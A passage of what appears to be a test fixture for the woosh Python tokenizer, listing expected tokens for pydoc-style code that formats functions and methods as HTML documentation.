woosh.Token(woosh.OP, ')', 1012, 35, 1012, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 1012, 36, 1013, 0),
woosh.Token(woosh.DEDENT, ' ', 1013, 0, 1013, 8),
woosh.Token(woosh.NAME, 'doc', 1013, 8, 1013, 11),
woosh.Token(woosh.OP, '=', 1013, 12, 1013, 13),
woosh.Token(woosh.NAME, 'self', 1013, 14, 1013, 18),
woosh.Token(woosh.OP, '.', 1013, 18, 1013, 19),
woosh.Token(woosh.NAME, 'markup', 1013, 19, 1013, 25),
woosh.Token(woosh.OP, '(', 1013, 25, 1013, 26),
woosh.Token(woosh.NAME, 'doc', 1013, 26, 1013, 29),
woosh.Token(woosh.OP, ',', 1013, 29, 1013, 30),
woosh.Token(woosh.NAME, 'self', 1013, 31, 1013, 35),
woosh.Token(woosh.OP, '.', 1013, 35, 1013, 36),
woosh.Token(woosh.NAME, 'preformat', 1013, 36, 1013, 45),
woosh.Token(woosh.OP, ',', 1013, 45, 1013, 46),
woosh.Token(woosh.NAME, 'funcs', 1013, 47, 1013, 52),
woosh.Token(woosh.OP, ',', 1013, 52, 1013, 53),
woosh.Token(woosh.NAME, 'classes', 1013, 54, 1013, 61),
woosh.Token(woosh.OP, ',', 1013, 61, 1013, 62),
woosh.Token(woosh.NAME, 'mdict', 1013, 63, 1013, 68),
woosh.Token(woosh.OP, ')', 1013, 68, 1013, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 1013, 69, 1014, 0),
woosh.Token(woosh.NAME, 'doc', 1014, 8, 1014, 11),
woosh.Token(woosh.OP, '=', 1014, 12, 1014, 13),
woosh.Token(woosh.NAME, 'doc', 1014, 14, 1014, 17),
woosh.Token(woosh.NAME, 'and', 1014, 18, 1014, 21),
woosh.Token(woosh.STRING, "'<tt>%s<br> </tt>'", 1014, 22, 1014, 45),
woosh.Token(woosh.OP, '%', 1014, 46, 1014, 47),
woosh.Token(woosh.NAME, 'doc', 1014, 48, 1014, 51),
woosh.Token(woosh.NEWLINE, '\r\n', 1014, 51, 1015, 0),
woosh.Token(woosh.NAME, 'return', 1016, 8, 1016, 14),
woosh.Token(woosh.NAME, 'self', 1016, 15, 1016, 19),
woosh.Token(woosh.OP, '.', 1016, 19, 1016, 20),
woosh.Token(woosh.NAME, 'section', 1016, 20, 1016, 27),
woosh.Token(woosh.OP, '(', 1016, 27, 1016, 28),
woosh.Token(woosh.NAME, 'title', 1016, 28, 1016, 33),
woosh.Token(woosh.OP, ',', 1016, 33, 1016, 34),
woosh.Token(woosh.STRING, "'#000000'", 1016, 35, 1016, 44),
woosh.Token(woosh.OP, ',', 1016, 44, 1016, 45),
woosh.Token(woosh.STRING, "'#ffc8d8'", 1016, 46, 1016, 55),
woosh.Token(woosh.OP, ',', 1016, 55, 1016, 56),
woosh.Token(woosh.NAME, 'contents', 1016, 57, 1016, 65),
woosh.Token(woosh.OP, ',', 1016, 65, 1016, 66),
woosh.Token(woosh.NUMBER, '3', 1016, 67, 1016, 68),
woosh.Token(woosh.OP, ',', 1016, 68, 1016, 69),
woosh.Token(woosh.NAME, 'doc', 1016, 70, 1016, 73),
woosh.Token(woosh.OP, ')', 1016, 73, 1016, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 1016, 74, 1017, 0),
woosh.Token(woosh.DEDENT, ' ', 1018, 0, 1018, 4),
woosh.Token(woosh.NAME, 'def', 1018, 4, 1018, 7),
woosh.Token(woosh.NAME, 'formatvalue', 1018, 8, 1018, 19),
woosh.Token(woosh.OP, '(', 1018, 19, 1018, 20),
woosh.Token(woosh.NAME, 'self', 1018, 20, 1018, 24),
woosh.Token(woosh.OP, ',', 1018, 24, 1018, 25),
woosh.Token(woosh.NAME, 'object', 1018, 26, 1018, 32),
woosh.Token(woosh.OP, ')', 1018, 32, 1018, 33),
woosh.Token(woosh.OP, ':', 1018, 33, 1018, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 1018, 34, 1019, 0),
woosh.Token(woosh.INDENT, ' ', 1019, 0, 1019, 8),
woosh.Token(woosh.STRING, '"""Format an argument default value as text."""', 1019, 8, 1019, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 1019, 55, 1020, 0),
woosh.Token(woosh.NAME, 'return', 1020, 8, 1020, 14),
woosh.Token(woosh.NAME, 'self', 1020, 15, 1020, 19),
woosh.Token(woosh.OP, '.', 1020, 19, 1020, 20),
woosh.Token(woosh.NAME, 'grey', 1020, 20, 1020, 24),
woosh.Token(woosh.OP, '(', 1020, 24, 1020, 25),
woosh.Token(woosh.STRING, "'='", 1020, 25, 1020, 28),
woosh.Token(woosh.OP, '+', 1020, 29, 1020, 30),
woosh.Token(woosh.NAME, 'self', 1020, 31, 1020, 35),
woosh.Token(woosh.OP, '.', 1020, 35, 1020, 36),
woosh.Token(woosh.NAME, 'repr', 1020, 36, 1020, 40),
woosh.Token(woosh.OP, '(', 1020, 40, 1020, 41),
woosh.Token(woosh.NAME, 'object', 1020, 41, 1020, 47),
woosh.Token(woosh.OP, ')', 1020, 47, 1020, 48),
woosh.Token(woosh.OP, ')', 1020, 48, 1020, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 1020, 49, 1021, 0),
woosh.Token(woosh.DEDENT, ' ', 1022, 0, 1022, 4),
woosh.Token(woosh.NAME, 'def', 1022, 4, 1022, 7),
woosh.Token(woosh.NAME, 'docroutine', 1022, 8, 1022, 18),
woosh.Token(woosh.OP, '(', 1022, 18, 1022, 19),
woosh.Token(woosh.NAME, 'self', 1022, 19, 1022, 23),
woosh.Token(woosh.OP, ',', 1022, 23, 1022, 24),
woosh.Token(woosh.NAME, 'object', 1022, 25, 1022, 31),
woosh.Token(woosh.OP, ',', 1022, 31, 1022, 32),
woosh.Token(woosh.NAME, 'name', 1022, 33, 1022, 37),
woosh.Token(woosh.OP, '=', 1022, 37, 1022, 38),
woosh.Token(woosh.NAME, 'None', 1022, 38, 1022, 42),
woosh.Token(woosh.OP, ',', 1022, 42, 1022, 43),
woosh.Token(woosh.NAME, 'mod', 1022, 44, 1022, 47),
woosh.Token(woosh.OP, '=', 1022, 47, 1022, 48),
woosh.Token(woosh.NAME, 'None', 1022, 48, 1022, 52),
woosh.Token(woosh.OP, ',', 1022, 52, 1022, 53),
woosh.Token(woosh.NAME, 'funcs', 1023, 19, 1023, 24),
woosh.Token(woosh.OP, '=', 1023, 24, 1023, 25),
woosh.Token(woosh.OP, '{', 1023, 25, 1023, 26),
woosh.Token(woosh.OP, '}', 1023, 26, 1023, 27),
woosh.Token(woosh.OP, ',', 1023, 27, 1023, 28),
woosh.Token(woosh.NAME, 'classes', 1023, 29, 1023, 36),
woosh.Token(woosh.OP, '=', 1023, 36, 1023, 37),
woosh.Token(woosh.OP, '{', 1023, 37, 1023, 38),
woosh.Token(woosh.OP, '}', 1023, 38, 1023, 39),
woosh.Token(woosh.OP, ',', 1023, 39, 1023, 40),
woosh.Token(woosh.NAME, 'methods', 1023, 41, 1023, 48),
woosh.Token(woosh.OP, '=', 1023, 48, 1023, 49),
woosh.Token(woosh.OP, '{', 1023, 49, 1023, 50),
woosh.Token(woosh.OP, '}', 1023, 50, 1023, 51),
woosh.Token(woosh.OP, ',', 1023, 51, 1023, 52),
woosh.Token(woosh.NAME, 'cl', 1023, 53, 1023, 55),
woosh.Token(woosh.OP, '=', 1023, 55, 1023, 56),
woosh.Token(woosh.NAME, 'None', 1023, 56, 1023, 60),
woosh.Token(woosh.OP, ')', 1023, 60, 1023, 61),
woosh.Token(woosh.OP, ':', 1023, 61, 1023, 62),
woosh.Token(woosh.NEWLINE, '\r\n', 1023, 62, 1024, 0),
woosh.Token(woosh.INDENT, ' ', 1024, 0, 1024, 8),
woosh.Token(woosh.STRING, '"""Produce HTML documentation for a function or method object."""', 1024, 8, 1024, 73),
woosh.Token(woosh.NEWLINE, '\r\n', 1024, 73, 1025, 0),
woosh.Token(woosh.NAME, 'realname', 1025, 8, 1025, 16),
woosh.Token(woosh.OP, '=', 1025, 17, 1025, 18),
woosh.Token(woosh.NAME, 'object', 1025, 19, 1025, 25),
woosh.Token(woosh.OP, '.', 1025, 25, 1025, 26),
woosh.Token(woosh.NAME, '__name__', 1025, 26, 1025, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 1025, 34, 1026, 0),
woosh.Token(woosh.NAME, 'name', 1026, 8, 1026, 12),
woosh.Token(woosh.OP, '=', 1026, 13, 1026, 14),
woosh.Token(woosh.NAME, 'name', 1026, 15, 1026, 19),
woosh.Token(woosh.NAME, 'or', 1026, 20, 1026, 22),
woosh.Token(woosh.NAME, 'realname', 1026, 23, 1026, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1026, 31, 1027, 0),
woosh.Token(woosh.NAME, 'anchor', 1027, 8, 1027, 14),
woosh.Token(woosh.OP, '=', 1027, 15, 1027, 16),
woosh.Token(woosh.OP, '(', 1027, 17, 1027, 18),
woosh.Token(woosh.NAME, 'cl', 1027, 18, 1027, 20),
woosh.Token(woosh.NAME, 'and', 1027, 21, 1027, 24),
woosh.Token(woosh.NAME, 'cl', 1027, 25, 1027, 27),
woosh.Token(woosh.OP, '.', 1027, 27, 1027, 28),
woosh.Token(woosh.NAME, '__name__', 1027, 28, 1027, 36),
woosh.Token(woosh.NAME, 'or', 1027, 37, 1027, 39),
woosh.Token(woosh.STRING, "''", 1027, 40, 1027, 42),
woosh.Token(woosh.OP, ')', 1027, 42, 1027, 43),
woosh.Token(woosh.OP, '+', 1027, 44, 1027, 45),
woosh.Token(woosh.STRING, "'-'", 1027, 46, 1027, 49),
woosh.Token(woosh.OP, '+', 1027, 50, 1027, 51),
woosh.Token(woosh.NAME, 'name', 1027, 52, 1027, 56),
woosh.Token(woosh.NEWLINE, '\r\n', 1027, 56, 1028, 0),
woosh.Token(woosh.NAME, 'note', 1028, 8, 1028, 12),
woosh.Token(woosh.OP, '=', 1028, 13, 1028, 14),
woosh.Token(woosh.STRING, "''", 1028, 15, 1028, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 1028, 17, 1029, 0),
woosh.Token(woosh.NAME, 'skipdocs', 1029, 8, 1029, 16),
woosh.Token(woosh.OP, '=', 1029, 17, 1029, 18),
woosh.Token(woosh.NUMBER, '0', 1029, 19, 1029, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 1029, 20, 1030, 0),
woosh.Token(woosh.NAME, 'if', 1030, 8, 1030, 10),
woosh.Token(woosh.NAME, '_is_bound_method', 1030, 11, 1030, 27),
woosh.Token(woosh.OP, '(', 1030, 27, 1030, 28),
woosh.Token(woosh.NAME, 'object', 1030, 28, 1030, 34),
woosh.Token(woosh.OP, ')', 1030, 34, 1030, 35),
woosh.Token(woosh.OP, ':', 1030, 35, 1030, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 1030, 36, 1031, 0),
woosh.Token(woosh.INDENT, ' ', 1031, 0, 1031, 12),
woosh.Token(woosh.NAME, 'imclass', 1031, 12, 1031, 19),
woosh.Token(woosh.OP, '=', 1031, 20, 1031, 21),
woosh.Token(woosh.NAME, 'object', 1031, 22, 1031, 28),
woosh.Token(woosh.OP, '.', 1031, 28, 1031, 29),
woosh.Token(woosh.NAME, '__self__', 1031, 29, 1031, 37),
woosh.Token(woosh.OP, '.', 1031, 37, 1031, 38),
woosh.Token(woosh.NAME, '__class__', 1031, 38, 1031, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 1031, 47, 1032, 0),
woosh.Token(woosh.NAME, 'if', 1032, 12, 1032, 14),
woosh.Token(woosh.NAME, 'cl', 1032, 15, 1032, 17),
woosh.Token(woosh.OP, ':', 1032, 17, 1032, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 1032, 18, 1033, 0),
woosh.Token(woosh.INDENT, ' ', 1033, 0, 1033, 16),
woosh.Token(woosh.NAME, 'if', 1033, 16, 1033, 18),
woosh.Token(woosh.NAME, 'imclass', 1033, 19, 1033, 26),
woosh.Token(woosh.NAME, 'is', 1033, 27, 1033, 29),
woosh.Token(woosh.NAME, 'not', 1033, 30, 1033, 33),
woosh.Token(woosh.NAME, 'cl', 1033, 34, 1033, 36),
woosh.Token(woosh.OP, ':', 1033, 36, 1033, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 1033, 37, 1034, 0),
woosh.Token(woosh.INDENT, ' ', 1034, 0, 1034, 20),
woosh.Token(woosh.NAME, 'note', 1034, 20, 1034, 24),
woosh.Token(woosh.OP, '=', 1034, 25, 1034, 26),
woosh.Token(woosh.STRING, "' from '", 1034, 27, 1034, 35),
woosh.Token(woosh.OP, '+', 1034, 36, 1034, 37),
woosh.Token(woosh.NAME, 'self', 1034, 38, 1034, 42),
woosh.Token(woosh.OP, '.', 1034, 42, 1034, 43),
woosh.Token(woosh.NAME, 'classlink', 1034, 43, 1034, 52),
woosh.Token(woosh.OP, '(', 1034, 52, 1034, 53),
woosh.Token(woosh.NAME, 'imclass', 1034, 53, 1034, 60),
woosh.Token(woosh.OP, ',', 1034, 60, 1034, 61),
woosh.Token(woosh.NAME, 'mod', 1034, 62, 1034, 65),
woosh.Token(woosh.OP, ')', 1034, 65, 1034, 66),
woosh.Token(woosh.NEWLINE, '\r\n', 1034, 66, 1035, 0),
woosh.Token(woosh.DEDENT, ' ', 1035, 0, 1035, 12),
woosh.Token(woosh.DEDENT, '', 1035, 12, 1035, 12),
woosh.Token(woosh.NAME, 'else', 1035, 12, 1035, 16),
woosh.Token(woosh.OP, ':', 1035, 16, 1035, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 1035, 17, 1036, 0),
woosh.Token(woosh.INDENT, ' ', 1036, 0, 1036, 16),
woosh.Token(woosh.NAME, 'if', 1036, 16, 1036, 18),
woosh.Token(woosh.NAME, 'object', 1036, 19, 1036, 25),
woosh.Token(woosh.OP, '.', 1036, 25, 1036, 26),
woosh.Token(woosh.NAME, '__self__', 1036, 26, 1036, 34),
woosh.Token(woosh.NAME, 'is', 1036, 35, 1036, 37),
woosh.Token(woosh.NAME, 'not', 1036, 38, 1036, 41),
woosh.Token(woosh.NAME, 'None', 1036, 42, 1036, 46),
woosh.Token(woosh.OP, ':', 1036, 46, 1036, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 1036, 47, 1037, 0),
woosh.Token(woosh.INDENT, ' ', 1037, 0, 1037, 20),
woosh.Token(woosh.NAME, 'note', 1037, 20, 1037, 24),
woosh.Token(woosh.OP, '=', 1037, 25, 1037, 26),
woosh.Token(woosh.STRING, "' method of %s instance'", 1037, 27, 1037, 51),
woosh.Token(woosh.OP, '%', 1037, 52, 1037, 53),
woosh.Token(woosh.NAME, 'self', 1037, 54, 1037, 58),
woosh.Token(woosh.OP, '.', 1037, 58, 1037, 59),
woosh.Token(woosh.NAME, 'classlink', 1037, 59, 1037, 68),
woosh.Token(woosh.OP, '(', 1037, 68, 1037, 69),
woosh.Token(woosh.NAME, 'object', 1038, 24, 1038, 30),
woosh.Token(woosh.OP, '.', 1038, 30, 1038, 31),
woosh.Token(woosh.NAME, '__self__', 1038, 31, 1038, 39),
woosh.Token(woosh.OP, '.', 1038, 39, 1038, 40),
woosh.Token(woosh.NAME, '__class__', 1038, 40, 1038, 49),
woosh.Token(woosh.OP, ',', 1038, 49, 1038, 50),
woosh.Token(woosh.NAME, 'mod', 1038, 51, 1038, 54),
woosh.Token(woosh.OP, ')', 1038, 54, 1038, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 1038, 55, 1039, 0),
woosh.Token(woosh.DEDENT, ' ', 1039, 0, 1039, 16),
woosh.Token(woosh.NAME, 'else', 1039, 16, 1039, 20),
woosh.Token(woosh.OP, ':', 1039, 20, 1039, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 1039, 21, 1040, 0),
woosh.Token(woosh.INDENT, ' ', 1040, 0, 1040, 20),
woosh.Token(woosh.NAME, 'note', 1040, 20, 1040, 24),
woosh.Token(woosh.OP, '=', 1040, 25, 1040, 26),
woosh.Token(woosh.STRING, "' unbound %s method'", 1040, 27, 1040, 47),
woosh.Token(woosh.OP, '%', 1040, 48, 1040, 49),
woosh.Token(woosh.NAME, 'self', 1040, 50, 1040, 54),
woosh.Token(woosh.OP, '.', 1040, 54, 1040, 55),
woosh.Token(woosh.NAME, 'classlink', 1040, 55, 1040, 64),
woosh.Token(woosh.OP, '(', 1040, 64, 1040, 65),
woosh.Token(woosh.NAME, 'imclass', 1040, 65, 1040, 72),
woosh.Token(woosh.OP, ',', 1040, 72, 1040, 73),
woosh.Token(woosh.NAME, 'mod', 1040, 73, 1040, 76),
woosh.Token(woosh.OP, ')', 1040, 76, 1040, 77),
woosh.Token(woosh.NEWLINE, '\r\n', 1040, 77, 1041, 0),
woosh.Token(woosh.DEDENT, ' ', 1042, 0, 1042, 8),
woosh.Token(woosh.DEDENT, '', 1042, 8, 1042, 8),
woosh.Token(woosh.DEDENT, '', 1042, 8, 1042, 8),
woosh.Token(woosh.NAME, 'if', 1042, 8, 1042, 10),
woosh.Token(woosh.OP, '(', 1042, 11, 1042, 12),
woosh.Token(woosh.NAME, 'inspect', 1042, 12, 1042, 19),
woosh.Token(woosh.OP, '.', 1042, 19, 1042, 20),
woosh.Token(woosh.NAME, 'iscoroutinefunction', 1042, 20, 1042, 39),
woosh.Token(woosh.OP, '(', 1042, 39, 1042, 40),
woosh.Token(woosh.NAME, 'object', 1042, 40, 1042, 46),
woosh.Token(woosh.OP, ')', 1042, 46, 1042, 47),
woosh.Token(woosh.NAME, 'or', 1042, 48, 1042, 50),
woosh.Token(woosh.NAME, 'inspect', 1043, 16, 1043, 23),
woosh.Token(woosh.OP, '.', 1043, 23, 1043, 24),
woosh.Token(woosh.NAME, 'isasyncgenfunction', 1043, 24, 1043, 42),
woosh.Token(woosh.OP, '(', 1043, 42, 1043, 43),
woosh.Token(woosh.NAME, 'object', 1043, 43, 1043, 49),
woosh.Token(woosh.OP, ')', 1043, 49, 1043, 50),
woosh.Token(woosh.OP, ')', 1043, 50, 1043, 51),
woosh.Token(woosh.OP, ':', 1043, 51, 1043, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 1043, 52, 1044, 0),
woosh.Token(woosh.INDENT, ' ', 1044, 0, 1044, 12),
woosh.Token(woosh.NAME, 'asyncqualifier', 1044, 12, 1044, 26),
woosh.Token(woosh.OP, '=', 1044, 27, 1044, 28),
woosh.Token(woosh.STRING, "'async '", 1044, 29, 1044, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 1044, 37, 1045, 0),
woosh.Token(woosh.DEDENT, ' ', 1045, 0, 1045, 8),
woosh.Token(woosh.NAME, 'else', 1045, 8, 1045, 12),
woosh.Token(woosh.OP, ':', 1045, 12, 1045, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 1045, 13, 1046, 0),
woosh.Token(woosh.INDENT, ' ', 1046, 0, 1046, 12),
woosh.Token(woosh.NAME, 'asyncqualifier', 1046, 12, 1046, 26),
woosh.Token(woosh.OP, '=', 1046, 27, 1046, 28),
woosh.Token(woosh.STRING, "''", 1046, 29, 1046, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1046, 31, 1047, 0),
woosh.Token(woosh.DEDENT, ' ', 1048, 0, 1048, 8),
woosh.Token(woosh.NAME, 'if', 1048, 8, 1048, 10),
woosh.Token(woosh.NAME, 'name', 1048, 11, 1048, 15),
woosh.Token(woosh.OP, '==', 1048, 16, 1048, 18),
woosh.Token(woosh.NAME, 'realname', 1048, 19, 1048, 27),
woosh.Token(woosh.OP, ':', 1048, 27, 1048, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 1048, 28, 1049, 0),
woosh.Token(woosh.INDENT, ' ', 1049, 0, 1049, 12),
woosh.Token(woosh.NAME, 'title', 1049, 12, 1049, 17),
woosh.Token(woosh.OP, '=', 1049, 18, 1049, 19),
woosh.Token(woosh.STRING, '\'<a name="%s"><strong>%s</strong></a>\'', 1049, 20, 1049, 58),
woosh.Token(woosh.OP, '%', 1049, 59, 1049, 60),
woosh.Token(woosh.OP, '(', 1049, 61, 1049, 62),
woosh.Token(woosh.NAME, 'anchor', 1049, 62, 1049, 68),
woosh.Token(woosh.OP, ',', 1049, 68, 1049, 69),
woosh.Token(woosh.NAME, 'realname', 1049, 70, 1049, 78),
woosh.Token(woosh.OP, ')', 1049, 78, 1049, 79),
woosh.Token(woosh.NEWLINE, '\r\n', 1049, 79, 1050, 0),
woosh.Token(woosh.DEDENT, ' ', 1050, 0, 1050, 8),
woosh.Token(woosh.NAME, 'else', 1050, 8, 1050, 12),
woosh.Token(woosh.OP, ':', 1050, 12, 1050, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 1050, 13, 1051, 0),
woosh.Token(woosh.INDENT, ' ', 1051, 0, 1051, 12),
woosh.Token(woosh.NAME, 'if', 1051, 12, 1051, 14),
woosh.Token(woosh.NAME, 'cl', 1051, 15, 1051, 17),
woosh.Token(woosh.NAME, 'and', 1051, 18, 1051, 21),
woosh.Token(woosh.NAME, 'inspect', 1051, 22, 1051, 29),
woosh.Token(woosh.OP, '.', 1051, 29, 1051, 30),
woosh.Token(woosh.NAME, 'getattr_static', 1051, 30, 1051, 44),
woosh.Token(woosh.OP, '(', 1051, 44, 1051, 45),
woosh.Token(woosh.NAME, 'cl', 1051, 45, 1051, 47),
woosh.Token(woosh.OP, ',', 1051, 47, 1051, 48),
woosh.Token(woosh.NAME, 'realname', 1051, 49, 1051, 57),
woosh.Token(woosh.OP, ',', 1051, 57, 1051, 58),
woosh.Token(woosh.OP, '[', 1051, 59, 1051, 60),
woosh.Token(woosh.OP, ']', 1051, 60, 1051, 61),
woosh.Token(woosh.OP, ')', 1051, 61, 1051, 62),
woosh.Token(woosh.NAME, 'is', 1051, 63, 1051, 65),
woosh.Token(woosh.NAME, 'object', 1051, 66, 1051, 72),
woosh.Token(woosh.OP, ':', 1051, 72, 1051, 73),
woosh.Token(woosh.NEWLINE, '\r\n', 1051, 73, 1052, 0),
woosh.Token(woosh.INDENT, ' ', 1052, 0, 1052, 16),
woosh.Token(woosh.NAME, 'reallink', 1052, 16, 1052, 24),
woosh.Token(woosh.OP, '=', 1052, 25, 1052, 26),
woosh.Token(woosh.STRING, '\'<a href="#%s">%s</a>\'', 1052, 27, 1052, 49),
woosh.Token(woosh.OP, '%', 1052, 50, 1052, 51),
woosh.Token(woosh.OP, '(', 1052, 52, 1052, 53),
woosh.Token(woosh.NAME, 'cl', 1053, 20, 1053, 22),
woosh.Token(woosh.OP, '.', 1053, 22, 1053, 23),
woosh.Token(woosh.NAME, '__name__', 1053, 23, 1053, 31),
woosh.Token(woosh.OP, '+', 1053, 32, 1053, 33),
woosh.Token(woosh.STRING, "'-'", 1053, 34, 1053, 37),
woosh.Token(woosh.OP, '+', 1053, 38, 1053, 39),
woosh.Token(woosh.NAME, 'realname', 1053, 40, 1053, 48),
woosh.Token(woosh.OP, ',', 1053, 48, 1053, 49),
woosh.Token(woosh.NAME, 'realname', 1053, 50, 1053, 58),
woosh.Token(woosh.OP, ')', 1053, 58, 1053, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 1053, 59, 1054, 0),
woosh.Token(woosh.NAME, 'skipdocs', 1054, 16, 1054, 24),
woosh.Token(woosh.OP, '=', 1054, 25, 1054, 26),
woosh.Token(woosh.NUMBER, '1', 1054, 27, 1054, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 1054, 28, 1055, 0),
woosh.Token(woosh.DEDENT, ' ', 1055, 0, 1055, 12),
woosh.Token(woosh.NAME, 'else', 1055, 12, 1055, 16),
woosh.Token(woosh.OP, ':', 1055, 16, 1055, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 1055, 17, 1056, 0),
woosh.Token(woosh.INDENT, ' ', 1056, 0, 1056, 16),
woosh.Token(woosh.NAME, 'reallink', 1056, 16, 1056, 24),
woosh.Token(woosh.OP, '=', 1056, 25, 1056, 26),
woosh.Token(woosh.NAME, 'realname', 1056, 27, 1056, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 1056, 35, 1057, 0),
woosh.Token(woosh.DEDENT, ' ', 1057, 0, 1057, 12),
woosh.Token(woosh.NAME, 'title', 1057, 12, 1057, 17),
woosh.Token(woosh.OP, '=', 1057, 18, 1057, 19),
woosh.Token(woosh.STRING, '\'<a name="%s"><strong>%s</strong></a> = %s\'', 1057, 20, 1057, 63),
woosh.Token(woosh.OP, '%', 1057, 64, 1057, 65),
woosh.Token(woosh.OP, '(', 1057, 66, 1057, 67),
woosh.Token(woosh.NAME, 'anchor', 1058, 16, 1058, 22),
woosh.Token(woosh.OP, ',', 1058, 22, 1058, 23),
woosh.Token(woosh.NAME, 'name', 1058, 24, 1058, 28),
woosh.Token(woosh.OP, ',', 1058, 28, 1058, 29),
woosh.Token(woosh.NAME, 'reallink', 1058, 30, 1058, 38),
woosh.Token(woosh.OP, ')', 1058, 38, 1058, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 1058, 39, 1059, 0),
woosh.Token(woosh.DEDENT, ' ', 1059, 0, 1059, 8),
woosh.Token(woosh.NAME, 'argspec', 1059, 8, 1059, 15),
woosh.Token(woosh.OP, '=', 1059, 16, 1059, 17),
woosh.Token(woosh.NAME, 'None', 1059, 18, 1059, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 1059, 22, 1060, 0),
woosh.Token(woosh.NAME, 'if', 1060, 8, 1060, 10),
woosh.Token(woosh.NAME, 'inspect', 1060, 11, 1060, 18),
woosh.Token(woosh.OP, '.', 1060, 18, 1060, 19),
woosh.Token(woosh.NAME, 'isroutine', 1060, 19, 1060, 28),
woosh.Token(woosh.OP, '(', 1060, 28, 1060, 29),
woosh.Token(woosh.NAME, 'object', 1060, 29, 1060, 35),
woosh.Token(woosh.OP, ')', 1060, 35, 1060, 36),
woosh.Token(woosh.OP, ':', 1060, 36, 1060, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 1060, 37, 1061, 0),
woosh.Token(woosh.INDENT, ' ', 1061, 0, 1061, 12),
woosh.Token(woosh.NAME, 'try', 1061, 12, 1061, 15),
woosh.Token(woosh.OP, ':', 1061, 15, 1061, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 1061, 16, 1062, 0),
woosh.Token(woosh.INDENT, ' ', 1062, 0, 1062, 16),
woosh.Token(woosh.NAME, 'signature', 1062, 16, 1062, 25),
woosh.Token(woosh.OP, '=', 1062, 26, 1062, 27),
woosh.Token(woosh.NAME, 'inspect', 1062, 28, 1062, 35),
woosh.Token(woosh.OP, '.', 1062, 35, 1062, 36),
woosh.Token(woosh.NAME, 'signature', 1062, 36, 1062, 45),
woosh.Token(woosh.OP, '(', 1062, 45, 1062, 46),
woosh.Token(woosh.NAME, 'object', 1062, 46, 1062, 52),
woosh.Token(woosh.OP, ')', 1062, 52, 1062, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 1062, 53, 1063, 0),
woosh.Token(woosh.DEDENT, ' ', 1063, 0, 1063, 12),
woosh.Token(woosh.NAME, 'except', 1063, 12, 1063, 18),
woosh.Token(woosh.OP, '(', 1063, 19, 1063, 20),
woosh.Token(woosh.NAME, 'ValueError', 1063, 20, 1063, 30),
woosh.Token(woosh.OP, ',', 1063, 30, 1063, 31),
woosh.Token(woosh.NAME, 'TypeError', 1063, 32, 1063, 41),
woosh.Token(woosh.OP, ')', 1063, 41, 1063, 42),
woosh.Token(woosh.OP, ':', 1063, 42, 1063, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 1063, 43, 1064, 0),
woosh.Token(woosh.INDENT, ' ', 1064, 0, 1064, 16),
woosh.Token(woosh.NAME, 'signature', 1064, 16, 1064, 25),
woosh.Token(woosh.OP, '=', 1064, 26, 1064, 27),
woosh.Token(woosh.NAME, 'None', 1064, 28, 1064, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 1064, 32, 1065, 0),
woosh.Token(woosh.DEDENT, ' ', 1065, 0, 1065, 12),
woosh.Token(woosh.NAME, 'if', 1065, 12, 1065, 14),
woosh.Token(woosh.NAME, 'signature', 1065, 15, 1065, 24),
woosh.Token(woosh.OP, ':', 1065, 24, 1065, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1065, 25, 1066, 0),
woosh.Token(woosh.INDENT, ' ', 1066, 0, 1066, 16),
woosh.Token(woosh.NAME, 'argspec', 1066, 16, 1066, 23),
woosh.Token(woosh.OP, '=', 1066, 24, 1066, 25),
woosh.Token(woosh.NAME, 'str', 1066, 26, 1066, 29),
woosh.Token(woosh.OP, '(', 1066, 29, 1066, 30),
woosh.Token(woosh.NAME, 'signature', 1066, 30, 1066, 39),
woosh.Token(woosh.OP, ')', 1066, 39, 1066, 40),
woosh.Token(woosh.NEWLINE, '\r\n', 1066, 40, 1067, 0),
woosh.Token(woosh.NAME, 'if', 1067, 16, 1067, 18),
woosh.Token(woosh.NAME, 'realname', 1067, 19, 1067, 27),
woosh.Token(woosh.OP, '==', 1067, 28, 1067, 30),
woosh.Token(woosh.STRING, "'<lambda>'", 1067, 31, 1067, 41),
woosh.Token(woosh.OP, ':', 1067, 41, 1067, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 1067, 42, 1068, 0),
woosh.Token(woosh.INDENT, ' ', 1068, 0, 1068, 20),
woosh.Token(woosh.NAME, 'title', 1068, 20, 1068, 25),
woosh.Token(woosh.OP, '=', 1068, 26, 1068, 27),
woosh.Token(woosh.STRING, "'<strong>%s</strong> <em>lambda</em> '", 1068, 28, 1068, 66),
woosh.Token(woosh.OP, '%', 1068, 67, 1068, 68),
woosh.Token(woosh.NAME, 'name', 1068, 69, 1068, 73),
woosh.Token(woosh.NEWLINE, '\r\n', 1068, 73, 1069, 0),
